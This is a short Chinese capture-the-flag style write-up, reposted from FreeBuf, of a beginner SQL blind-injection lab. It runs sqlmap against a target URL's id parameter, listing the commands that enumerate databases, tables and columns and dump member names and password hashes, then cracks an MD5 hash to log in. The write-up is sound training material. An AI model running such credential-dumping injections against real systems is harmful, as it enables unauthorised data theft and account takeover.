墨者靶场SQL盲注（入门）

红帽社区是一个垂直网络安全社区，融合“红帽先锋”正能量精神，每日分享最新安全资讯，提供安全问答、靶场、众测、漏洞库等功能，是网络安全爱好者学习、交流的优质社区。

1.打开靶场，看到此处（主要是针对SQL注入，所有直接找注入点，登录先不看）


2.看到了平台停机维护，看到URL的参数id，下意识以为找到位置了

3.放到神器sqlmap跑一下看看，发现目标！

4.继续爆破数据库、表、用户名密码

sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 --dbs

sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup --tables



sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup -T member --columns

sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup -T member -C name,password --dump


5.获取密码后，发现是md5加密，进行解密后发现第二账号可以登录，登录后即可看到KEY


原作者：可乐kele， 转载自FreeBuf